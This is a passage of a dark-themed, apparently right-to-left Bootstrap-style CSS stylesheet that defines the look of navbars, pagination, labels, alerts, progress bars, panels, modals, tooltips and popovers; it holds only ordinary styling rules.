  color: #ffffff;
  background-color: #080808;
}
.navbar-default .navbar-nav > .disabled > a,
.navbar-default .navbar-nav > .disabled > a:hover,
.navbar-default .navbar-nav > .disabled > a:focus {
  color: #444444;
  background-color: transparent;
}
.navbar-default .navbar-toggle {
  border-color: #333333;
}
.navbar-default .navbar-toggle:hover,
.navbar-default .navbar-toggle:focus {
  background-color: #333333;
}
.navbar-default .navbar-toggle .icon-bar {
  background-color: #cccccc;
}
.navbar-default .navbar-collapse,
.navbar-default .navbar-form {
  border-color: #1f1f1f;
}
.navbar-default .navbar-nav > .open > a,
.navbar-default .navbar-nav > .open > a:hover,
.navbar-default .navbar-nav > .open > a:focus {
  background-color: #080808;
  color: #ffffff;
}
@media (max-width: 767px) {
  .navbar-default .navbar-nav .open .dropdown-menu > li > a {
    color: #878787;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: #080808;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #444444;
    background-color: transparent;
  }
}
.navbar-default .navbar-link {
  color: #878787;
}
.navbar-default .navbar-link:hover {
  color: #ffffff;
}
.navbar-inverse {
  background-color: #222222;
  border-color: #080808;
}
.navbar-inverse .navbar-brand {
  color: #5a5a5a;
}
.navbar-inverse .navbar-brand:hover,
.navbar-inverse .navbar-brand:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-inverse .navbar-text {
  color: #5a5a5a;
}
.navbar-inverse .navbar-nav > li > a {
  color: #5a5a5a;
}
.navbar-inverse .navbar-nav > li > a:hover,
.navbar-inverse .navbar-nav > li > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-inverse .navbar-nav > .active > a,
.navbar-inverse .navbar-nav > .active > a:hover,
.navbar-inverse .navbar-nav > .active > a:focus {
  color: #ffffff;
  background-color: #080808;
}
.navbar-inverse .navbar-nav > .disabled > a,
.navbar-inverse .navbar-nav > .disabled > a:hover,
.navbar-inverse .navbar-nav > .disabled > a:focus {
  color: #444444;
  background-color: transparent;
}
.navbar-inverse .navbar-toggle {
  border-color: #333333;
}
.navbar-inverse .navbar-toggle:hover,
.navbar-inverse .navbar-toggle:focus {
  background-color: #333333;
}
.navbar-inverse .navbar-toggle .icon-bar {
  background-color: #ffffff;
}
.navbar-inverse .navbar-collapse,
.navbar-inverse .navbar-form {
  border-color: #101010;
}
.navbar-inverse .navbar-nav > .open > a,
.navbar-inverse .navbar-nav > .open > a:hover,
.navbar-inverse .navbar-nav > .open > a:focus {
  background-color: #080808;
  color: #ffffff;
}
@media (max-width: 767px) {
  .navbar-inverse .navbar-nav .open .dropdown-menu > .dropdown-header {
    border-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu .divider {
    background-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a {
    color: #5a5a5a;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #444444;
    background-color: transparent;
  }
}
.navbar-inverse .navbar-link {
  color: #5a5a5a;
}
.navbar-inverse .navbar-link:hover {
  color: #ffffff;
}
.breadcrumb {
  padding: 8px 15px;
  margin-bottom: 20px;
  list-style: none;
  background-color: #2d2d2d;
  border-radius: 4px;
}
.breadcrumb > li {
  display: inline-block;
}
.breadcrumb > li + li:before {
  content: "/\00a0";
  padding: 0 5px;
  color: #878787;
}
.breadcrumb > .active {
  color: #ffffff;
}
.pagination {
  display: inline-block;
  padding-right: 0;
  margin: 20px 0;
  border-radius: 4px;
}
.pagination > li {
  display: inline;
}
.pagination > li > a,
.pagination > li > span {
  position: relative;
  float: right;
  padding: 6px 12px;
  line-height: 1.428571429;
  text-decoration: none;
  background-color: #2d2d2d;
  border: 1px solid #1f1f1f;
  margin-right: -1px;
}
.pagination > li:first-child > a,
.pagination > li:first-child > span {
  margin-right: 0;
  border-bottom-right-radius: 4px;
  border-top-right-radius: 4px;
}
.pagination > li:last-child > a,
.pagination > li:last-child > span {
  border-bottom-left-radius: 4px;
  border-top-left-radius: 4px;
}
.pagination > li > a:hover,
.pagination > li > span:hover,
.pagination > li > a:focus,
.pagination > li > span:focus {
  background-color: #4b4b4b;
}
.pagination > .active > a,
.pagination > .active > span,
.pagination > .active > a:hover,
.pagination > .active > span:hover,
.pagination > .active > a:focus,
.pagination > .active > span:focus {
  z-index: 2;
  color: #ffffff;
  background-color: #0077bb;
  border-color: #0077bb;
  cursor: default;
}
.pagination > .disabled > span,
.pagination > .disabled > span:hover,
.pagination > .disabled > span:focus,
.pagination > .disabled > a,
.pagination > .disabled > a:hover,
.pagination > .disabled > a:focus {
  color: #4b4b4b;
  background-color: #2d2d2d;
  border-color: #1f1f1f;
  cursor: not-allowed;
}
.pagination-lg > li > a,
.pagination-lg > li > span {
  padding: 10px 16px;
  font-size: 18px;
}
.pagination-lg > li:first-child > a,
.pagination-lg > li:first-child > span {
  border-bottom-right-radius: 6px;
  border-top-right-radius: 6px;
}
.pagination-lg > li:last-child > a,
.pagination-lg > li:last-child > span {
  border-bottom-left-radius: 6px;
  border-top-left-radius: 6px;
}
.pagination-sm > li > a,
.pagination-sm > li > span {
  padding: 5px 10px;
  font-size: 12px;
}
.pagination-sm > li:first-child > a,
.pagination-sm > li:first-child > span {
  border-bottom-right-radius: 3px;
  border-top-right-radius: 3px;
}
.pagination-sm > li:last-child > a,
.pagination-sm > li:last-child > span {
  border-bottom-left-radius: 3px;
  border-top-left-radius: 3px;
}
.pager {
  padding-right: 0;
  margin: 20px 0;
  list-style: none;
  text-align: center;
}
.pager:before,
.pager:after {
  content: " ";
  display: table;
}
.pager:after {
  clear: both;
}
.pager:before,
.pager:after {
  content: " ";
  display: table;
}
.pager:after {
  clear: both;
}
.pager li {
  display: inline;
}
.pager li > a,
.pager li > span {
  display: inline-block;
  padding: 5px 14px;
  background-color: #2d2d2d;
  border: 1px solid #1f1f1f;
  border-radius: 15px;
}
.pager li > a:hover,
.pager li > a:focus {
  text-decoration: none;
  background-color: #4b4b4b;
}
.pager .next > a,
.pager .next > span {
  float: left;
}
.pager .previous > a,
.pager .previous > span {
  float: right;
}
.pager .disabled > a,
.pager .disabled > a:hover,
.pager .disabled > a:focus,
.pager .disabled > span {
  color: #5a5a5a;
  background-color: #2d2d2d;
  cursor: not-allowed;
}
.label {
  display: inline;
  padding: .2em .6em .3em;
  font-size: 75%;
  font-weight: bold;
  line-height: 1;
  color: #ffffff;
  text-align: center;
  white-space: nowrap;
  vertical-align: baseline;
  border-radius: .25em;
}
.label[href]:hover,
.label[href]:focus {
  color: #ffffff;
  text-decoration: none;
  cursor: pointer;
}
.label:empty {
  display: none;
}
.btn .label {
  position: relative;
  top: -1px;
}
.label-default {
  background-color: #5a5a5a;
}
.label-default[href]:hover,
.label-default[href]:focus {
  background-color: #414141;
}
.label-primary {
  background-color: #0077bb;
}
.label-primary[href]:hover,
.label-primary[href]:focus {
  background-color: #005788;
}
.label-success {
  background-color: #5cb85c;
}
.label-success[href]:hover,
.label-success[href]:focus {
  background-color: #449d44;
}
.label-info {
  background-color: #5bc0de;
}
.label-info[href]:hover,
.label-info[href]:focus {
  background-color: #31b0d5;
}
.label-warning {
  background-color: #f0ad4e;
}
.label-warning[href]:hover,
.label-warning[href]:focus {
  background-color: #ec971f;
}
.label-danger {
  background-color: #d9534f;
}
.label-danger[href]:hover,
.label-danger[href]:focus {
  background-color: #c9302c;
}
.badge {
  display: inline-block;
  min-width: 10px;
  padding: 3px 7px;
  font-size: 12px;
  font-weight: bold;
  color: #ffffff;
  line-height: 1;
  vertical-align: baseline;
  white-space: nowrap;
  text-align: center;
  background-color: #5a5a5a;
  border-radius: 10px;
}
.badge:empty {
  display: none;
}
.btn .badge {
  position: relative;
  top: -1px;
}
a.badge:hover,
a.badge:focus {
  color: #ffffff;
  text-decoration: none;
  cursor: pointer;
}
a.list-group-item.active > .badge,
.nav-pills > .active > a > .badge {
  color: #ffffff;
  background-color: #ffffff;
}
.nav-pills > li > a > .badge {
  margin-right: 3px;
}
.jumbotron {
  padding: 30px;
  margin-bottom: 30px;
  font-size: 21px;
  font-weight: 200;
  line-height: 2.1428571435;
  color: inherit;
  background-color: #878787;
}
.jumbotron h1,
.jumbotron .h1 {
  line-height: 1;
  color: #ffffff;
}
.jumbotron p {
  line-height: 1.4;
}
.container .jumbotron {
  border-radius: 6px;
}
.jumbotron .container {
  max-width: 100%;
}
@media screen and (min-width: 768px) {
  .jumbotron {
    padding-top: 48px;
    padding-bottom: 48px;
  }
  .container .jumbotron {
    padding-right: 60px;
    padding-left: 60px;
  }
  .jumbotron h1,
  .jumbotron .h1 {
    font-size: 63px;
  }
}
.thumbnail {
  display: block;
  padding: 4px;
  margin-bottom: 20px;
  line-height: 1.428571429;
  background-color: #1f1f1f;
  border: 1px solid #dddddd;
  border-radius: 4px;
  -webkit-transition: all 0.2s ease-in-out;
  transition: all 0.2s ease-in-out;
}
.thumbnail > img,
.thumbnail a > img {
  display: block;
  max-width: 100%;
  height: auto;
  margin-right: auto;
  margin-left: auto;
}
a.thumbnail:hover,
a.thumbnail:focus,
a.thumbnail.active {
  border-color: #ffffff;
}
.thumbnail .caption {
  padding: 9px;
  color: #878787;
}
.alert {
  padding: 15px;
  margin-bottom: 20px;
  border: 1px solid transparent;
  border-radius: 4px;
}
.alert h4 {
  margin-top: 0;
  color: inherit;
}
.alert .alert-link {
  font-weight: bold;
}
.alert > p,
.alert > ul {
  margin-bottom: 0;
}
.alert > p + p {
  margin-top: 5px;
}
.alert-dismissable {
  padding-left: 35px;
}
.alert-dismissable .close {
  position: relative;
  top: -2px;
  left: -21px;
  color: inherit;
}
.alert-success {
  background-color: #dff0d8;
  border-color: #d6e9c6;
  color: #468847;
}
.alert-success hr {
  border-top-color: #c9e2b3;
}
.alert-success .alert-link {
  color: #356635;
}
.alert-info {
  background-color: #d9edf7;
  border-color: #bce8f1;
  color: #3a87ad;
}
.alert-info hr {
  border-top-color: #a6e1ec;
}
.alert-info .alert-link {
  color: #2d6987;
}
.alert-warning {
  background-color: #fcf8e3;
  border-color: #faebcc;
  color: #c09853;
}
.alert-warning hr {
  border-top-color: #f7e1b5;
}
.alert-warning .alert-link {
  color: #a47e3c;
}
.alert-danger {
  background-color: #f2dede;
  border-color: #ebccd1;
  color: #b94a48;
}
.alert-danger hr {
  border-top-color: #e4b9c0;
}
.alert-danger .alert-link {
  color: #953b39;
}
@-webkit-keyframes progress-bar-stripes {
  from {
    background-position: 40px 0;
  }
  to {
    background-position: 100% 0;
  }
}
@keyframes progress-bar-stripes {
  from {
    background-position: 40px 0;
  }
  to {
    background-position: 100% 0;
  }
}
.progress {
  overflow: hidden;
  height: 20px;
  margin-bottom: 20px;
  background-color: #f5f5f5;
  border-radius: 4px;
  -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
  box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
}
.progress-bar {
  float: right;
  width: 0%;
  height: 100%;
  font-size: 12px;
  line-height: 20px;
  color: #ffffff;
  text-align: center;
  background-color: #0077bb;
  -webkit-box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
  box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
  -webkit-transition: width 0.6s ease;
  transition: width 0.6s ease;
}
.progress-striped .progress-bar {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-size: 40px 40px;
}
.progress.active .progress-bar {
  -webkit-animation: progress-bar-stripes 2s linear infinite;
  animation: progress-bar-stripes 2s linear infinite;
}
.progress-bar-success {
  background-color: #5cb85c;
}
.progress-striped .progress-bar-success {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-info {
  background-color: #5bc0de;
}
.progress-striped .progress-bar-info {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-warning {
  background-color: #f0ad4e;
}
.progress-striped .progress-bar-warning {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-danger {
  background-color: #d9534f;
}
.progress-striped .progress-bar-danger {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.media,
.media-body {
  overflow: hidden;
  zoom: 1;
}
.media,
.media .media {
  margin-top: 15px;
}
.media:first-child {
  margin-top: 0;
}
.media-object {
  display: block;
}
.media-heading {
  margin: 0 0 5px;
}
.media > .pull-left {
  margin-left: 10px;
}
.media > .pull-right {
  margin-right: 10px;
}
.media-list {
  padding-right: 0;
  list-style: none;
}
.list-group {
  margin-bottom: 20px;
  padding-right: 0;
}
.list-group-item {
  position: relative;
  display: block;
  padding: 10px 15px;
  margin-bottom: -1px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
}
.list-group-item:first-child {
  border-top-left-radius: 4px;
  border-top-right-radius: 4px;
}
.list-group-item:last-child {
  margin-bottom: 0;
  border-bottom-left-radius: 4px;
  border-bottom-right-radius: 4px;
}
.list-group-item > .badge {
  float: left;
}
.list-group-item > .badge + .badge {
  margin-left: 5px;
}
a.list-group-item {
  color: #555555;
}
a.list-group-item .list-group-item-heading {
  color: #333333;
}
a.list-group-item:hover,
a.list-group-item:focus {
  text-decoration: none;
  background-color: #f5f5f5;
}
a.list-group-item.active,
a.list-group-item.active:hover,
a.list-group-item.active:focus {
  z-index: 2;
  color: #ffffff;
  background-color: #0077bb;
  border-color: #0077bb;
}
a.list-group-item.active .list-group-item-heading,
a.list-group-item.active:hover .list-group-item-heading,
a.list-group-item.active:focus .list-group-item-heading {
  color: inherit;
}
a.list-group-item.active .list-group-item-text,
a.list-group-item.active:hover .list-group-item-text,
a.list-group-item.active:focus .list-group-item-text {
  color: #88d4ff;
}
.list-group-item-heading {
  margin-top: 0;
  margin-bottom: 5px;
}
.list-group-item-text {
  margin-bottom: 0;
  line-height: 1.3;
}
.panel {
  margin-bottom: 20px;
  background-color: #ffffff;
  border: 1px solid transparent;
  border-radius: 4px;
  -webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05);
  box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05);
}
.panel-body {
  padding: 15px;
}
.panel-body:before,
.panel-body:after {
  content: " ";
  display: table;
}
.panel-body:after {
  clear: both;
}
.panel-body:before,
.panel-body:after {
  content: " ";
  display: table;
}
.panel-body:after {
  clear: both;
}
.panel > .list-group {
  margin-bottom: 0;
}
.panel > .list-group .list-group-item {
  border-width: 1px 0;
}
.panel > .list-group .list-group-item:first-child {
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}
.panel > .list-group .list-group-item:last-child {
  border-bottom: 0;
}
.panel-heading + .list-group .list-group-item:first-child {
  border-top-width: 0;
}
.panel > .table,
.panel > .table-responsive > .table {
  margin-bottom: 0;
}
.panel > .panel-body + .table,
.panel > .panel-body + .table-responsive {
  border-top: 1px solid #dddddd;
}
.panel > .table > tbody:first-child th,
.panel > .table > tbody:first-child td {
  border-top: 0;
}
.panel > .table-bordered,
.panel > .table-responsive > .table-bordered {
  border: 0;
}
.panel > .table-bordered > thead > tr > th:first-child,
.panel > .table-responsive > .table-bordered > thead > tr > th:first-child,
.panel > .table-bordered > tbody > tr > th:first-child,
.panel > .table-responsive > .table-bordered > tbody > tr > th:first-child,
.panel > .table-bordered > tfoot > tr > th:first-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > th:first-child,
.panel > .table-bordered > thead > tr > td:first-child,
.panel > .table-responsive > .table-bordered > thead > tr > td:first-child,
.panel > .table-bordered > tbody > tr > td:first-child,
.panel > .table-responsive > .table-bordered > tbody > tr > td:first-child,
.panel > .table-bordered > tfoot > tr > td:first-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > td:first-child {
  border-right: 0;
}
.panel > .table-bordered > thead > tr > th:last-child,
.panel > .table-responsive > .table-bordered > thead > tr > th:last-child,
.panel > .table-bordered > tbody > tr > th:last-child,
.panel > .table-responsive > .table-bordered > tbody > tr > th:last-child,
.panel > .table-bordered > tfoot > tr > th:last-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > th:last-child,
.panel > .table-bordered > thead > tr > td:last-child,
.panel > .table-responsive > .table-bordered > thead > tr > td:last-child,
.panel > .table-bordered > tbody > tr > td:last-child,
.panel > .table-responsive > .table-bordered > tbody > tr > td:last-child,
.panel > .table-bordered > tfoot > tr > td:last-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > td:last-child {
  border-left: 0;
}
.panel > .table-bordered > thead > tr:last-child > th,
.panel > .table-responsive > .table-bordered > thead > tr:last-child > th,
.panel > .table-bordered > tbody > tr:last-child > th,
.panel > .table-responsive > .table-bordered > tbody > tr:last-child > th,
.panel > .table-bordered > tfoot > tr:last-child > th,
.panel > .table-responsive > .table-bordered > tfoot > tr:last-child > th,
.panel > .table-bordered > thead > tr:last-child > td,
.panel > .table-responsive > .table-bordered > thead > tr:last-child > td,
.panel > .table-bordered > tbody > tr:last-child > td,
.panel > .table-responsive > .table-bordered > tbody > tr:last-child > td,
.panel > .table-bordered > tfoot > tr:last-child > td,
.panel > .table-responsive > .table-bordered > tfoot > tr:last-child > td {
  border-bottom: 0;
}
.panel > .table-responsive {
  border: 0;
  margin-bottom: 0;
}
.panel-heading {
  padding: 10px 15px;
  border-bottom: 1px solid transparent;
  border-top-left-radius: 3px;
  border-top-right-radius: 3px;
}
.panel-heading > .dropdown .dropdown-toggle {
  color: inherit;
}
.panel-title {
  margin-top: 0;
  margin-bottom: 0;
  font-size: 16px;
  color: inherit;
}
.panel-title > a {
  color: inherit;
}
.panel-footer {
  padding: 10px 15px;
  background-color: #f5f5f5;
  border-top: 1px solid #dddddd;
  border-bottom-left-radius: 3px;
  border-bottom-right-radius: 3px;
}
.panel-group .panel {
  margin-bottom: 0;
  border-radius: 4px;
  overflow: hidden;
}
.panel-group .panel + .panel {
  margin-top: 5px;
}
.panel-group .panel-heading {
  border-bottom: 0;
}
.panel-group .panel-heading + .panel-collapse .panel-body {
  border-top: 1px solid #dddddd;
}
.panel-group .panel-footer {
  border-top: 0;
}
.panel-group .panel-footer + .panel-collapse .panel-body {
  border-bottom: 1px solid #dddddd;
}
.panel-default {
  border-color: #dddddd;
}
.panel-default > .panel-heading {
  color: #2d2d2d;
  background-color: #f5f5f5;
  border-color: #dddddd;
}
.panel-default > .panel-heading + .panel-collapse .panel-body {
  border-top-color: #dddddd;
}
.panel-default > .panel-footer + .panel-collapse .panel-body {
  border-bottom-color: #dddddd;
}
.panel-primary {
  border-color: #0077bb;
}
.panel-primary > .panel-heading {
  color: #ffffff;
  background-color: #0077bb;
  border-color: #0077bb;
}
.panel-primary > .panel-heading + .panel-collapse .panel-body {
  border-top-color: #0077bb;
}
.panel-primary > .panel-footer + .panel-collapse .panel-body {
  border-bottom-color: #0077bb;
}
.panel-success {
  border-color: #d6e9c6;
}
.panel-success > .panel-heading {
  color: #468847;
  background-color: #dff0d8;
  border-color: #d6e9c6;
}
.panel-success > .panel-heading + .panel-collapse .panel-body {
  border-top-color: #d6e9c6;
}
.panel-success > .panel-footer + .panel-collapse .panel-body {
  border-bottom-color: #d6e9c6;
}
.panel-warning {
  border-color: #faebcc;
}
.panel-warning > .panel-heading {
  color: #c09853;
  background-color: #fcf8e3;
  border-color: #faebcc;
}
.panel-warning > .panel-heading + .panel-collapse .panel-body {
  border-top-color: #faebcc;
}
.panel-warning > .panel-footer + .panel-collapse .panel-body {
  border-bottom-color: #faebcc;
}
.panel-danger {
  border-color: #ebccd1;
}
.panel-danger > .panel-heading {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #ebccd1;
}
.panel-danger > .panel-heading + .panel-collapse .panel-body {
  border-top-color: #ebccd1;
}
.panel-danger > .panel-footer + .panel-collapse .panel-body {
  border-bottom-color: #ebccd1;
}
.panel-info {
  border-color: #bce8f1;
}
.panel-info > .panel-heading {
  color: #3a87ad;
  background-color: #d9edf7;
  border-color: #bce8f1;
}
.panel-info > .panel-heading + .panel-collapse .panel-body {
  border-top-color: #bce8f1;
}
.panel-info > .panel-footer + .panel-collapse .panel-body {
  border-bottom-color: #bce8f1;
}
.well {
  min-height: 20px;
  padding: 19px;
  margin-bottom: 20px;
  background-color: #f5f5f5;
  border: 1px solid #e3e3e3;
  border-radius: 4px;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05);
}
.well blockquote {
  border-color: #ddd;
  border-color: rgba(0, 0, 0, 0.15);
}
.well-lg {
  padding: 24px;
  border-radius: 6px;
}
.well-sm {
  padding: 9px;
  border-radius: 3px;
}
.close {
  float: left;
  font-size: 21px;
  font-weight: bold;
  line-height: 1;
  color: #000000;
  text-shadow: 0 1px 0 #ffffff;
  opacity: 0.2;
  filter: alpha(opacity=20);
}
.close:hover,
.close:focus {
  color: #000000;
  text-decoration: none;
  cursor: pointer;
  opacity: 0.5;
  filter: alpha(opacity=50);
}
button.close {
  padding: 0;
  cursor: pointer;
  background: transparent;
  border: 0;
  -webkit-appearance: none;
}
.modal-open {
  overflow: hidden;
}
.modal {
  display: none;
  overflow: auto;
  overflow-y: scroll;
  position: fixed;
  top: 0;
  left: 0;
  bottom: 0;
  right: 0;
  z-index: 1040;
}
.modal.fade .modal-dialog {
  -webkit-transform: translate(0, -25%);
  -ms-transform: translate(0, -25%);
  transform: translate(0, -25%);
  -webkit-transition: -webkit-transform 0.3s ease-out;
  -moz-transition: -moz-transform 0.3s ease-out;
  -o-transition: -o-transform 0.3s ease-out;
  transition: transform 0.3s ease-out;
}
.modal.in .modal-dialog {
  -webkit-transform: translate(0, 0);
  -ms-transform: translate(0, 0);
  transform: translate(0, 0);
}
.modal-dialog {
  position: relative;
  width: auto;
  margin: 10px;
  z-index: 1050;
}
.modal-content {
  position: relative;
  background-color: #ffffff;
  border: 1px solid #999999;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 6px;
  -webkit-box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
  box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
  background-clip: padding-box;
  outline: none;
}
.modal-backdrop {
  position: fixed;
  top: 0;
  left: 0;
  bottom: 0;
  right: 0;
  z-index: 1030;
  background-color: #000000;
}
.modal-backdrop.fade {
  opacity: 0;
  filter: alpha(opacity=0);
}
.modal-backdrop.in {
  opacity: 0.5;
  filter: alpha(opacity=50);
}
.modal-header {
  padding: 15px;
  border-bottom: 1px solid #e5e5e5;
  min-height: 16.428571429px;
}
.modal-header .close {
  margin-top: -2px;
}
.modal-title {
  margin: 0;
  line-height: 1.428571429;
}
.modal-body {
  position: relative;
  padding: 20px;
}
.modal-footer {
  margin-top: 15px;
  padding: 19px 20px 20px;
  text-align: left;
  border-top: 1px solid #e5e5e5;
}
.modal-footer:before,
.modal-footer:after {
  content: " ";
  display: table;
}
.modal-footer:after {
  clear: both;
}
.modal-footer:before,
.modal-footer:after {
  content: " ";
  display: table;
}
.modal-footer:after {
  clear: both;
}
.modal-footer .btn + .btn {
  margin-right: 5px;
  margin-bottom: 0;
}
.modal-footer .btn-group .btn + .btn {
  margin-right: -1px;
}
.modal-footer .btn-block + .btn-block {
  margin-right: 0;
}
@media screen and (min-width: 768px) {
  .modal-dialog {
    width: 600px;
    margin: 30px auto;
  }
  .modal-content {
    -webkit-box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
    box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
  }
}
.tooltip {
  position: absolute;
  z-index: 1030;
  display: block;
  visibility: visible;
  font-size: 12px;
  line-height: 1.4;
  opacity: 0;
  filter: alpha(opacity=0);
}
.tooltip.in {
  opacity: 0.9;
  filter: alpha(opacity=90);
}
.tooltip.top {
  margin-top: -3px;
  padding: 5px 0;
}
.tooltip.right {
  margin-right: 3px;
  padding: 0 5px;
}
.tooltip.bottom {
  margin-top: 3px;
  padding: 5px 0;
}
.tooltip.left {
  margin-right: -3px;
  padding: 0 5px;
}
.tooltip-inner {
  max-width: 200px;
  padding: 3px 8px;
  color: #ffffff;
  text-align: center;
  text-decoration: none;
  background-color: #000000;
  border-radius: 4px;
}
.tooltip-arrow {
  position: absolute;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
}
.tooltip.top .tooltip-arrow {
  bottom: 0;
  right: 50%;
  margin-right: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.top-left .tooltip-arrow {
  bottom: 0;
  right: 5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.top-right .tooltip-arrow {
  bottom: 0;
  left: 5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.right .tooltip-arrow {
  top: 50%;
  right: 0;
  margin-top: -5px;
  border-width: 5px 0 5px 5px;
  border-left-color: #000000;
}
.tooltip.left .tooltip-arrow {
  top: 50%;
  left: 0;
  margin-top: -5px;
  border-width: 5px 5px 5px 0;
  border-right-color: #000000;
}
.tooltip.bottom .tooltip-arrow {
  top: 0;
  right: 50%;
  margin-right: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.tooltip.bottom-left .tooltip-arrow {
  top: 0;
  right: 5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.tooltip.bottom-right .tooltip-arrow {
  top: 0;
  left: 5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.popover {
  position: absolute;
  top: 0;
  right: 0;
  z-index: 1010;
  display: none;
  max-width: 276px;
  padding: 1px;
  text-align: right;
  background-color: #ffffff;
  background-clip: padding-box;
  border: 1px solid #cccccc;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 6px;
  -webkit-box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2);
  box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2);
  white-space: normal;
}
.popover.top {
  margin-top: -10px;
}
.popover.right {
  margin-right: 10px;
}
.popover.bottom {
  margin-top: 10px;
}
.popover.left {
  margin-right: -10px;
}
.popover-title {
  margin: 0;
  padding: 8px 14px;
  font-size: 14px;
  font-weight: normal;
  line-height: 18px;
  background-color: #f7f7f7;
  border-bottom: 1px solid #ebebeb;
  border-radius: 5px 5px 0 0;
}
.popover-content {
  padding: 9px 14px;
}
.popover .arrow,
.popover .arrow:after {
  position: absolute;
  display: block;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
}
.popover .arrow {
  border-width: 11px;
}
.popover .arrow:after {
  border-width: 10px;
  content: "";
}
.popover.top .arrow {
  right: 50%;
  margin-right: -11px;
  border-bottom-width: 0;
  border-top-color: #999999;
  border-top-color: rgba(0, 0, 0, 0.25);
  bottom: -11px;
}
.popover.top .arrow:after {
  content: " ";
  bottom: 1px;
  margin-right: -10px;
  border-bottom-width: 0;
  border-top-color: #ffffff;
}
.popover.right .arrow {
  top: 50%;
  right: -11px;
  margin-top: -11px;
  border-right-width: 0;
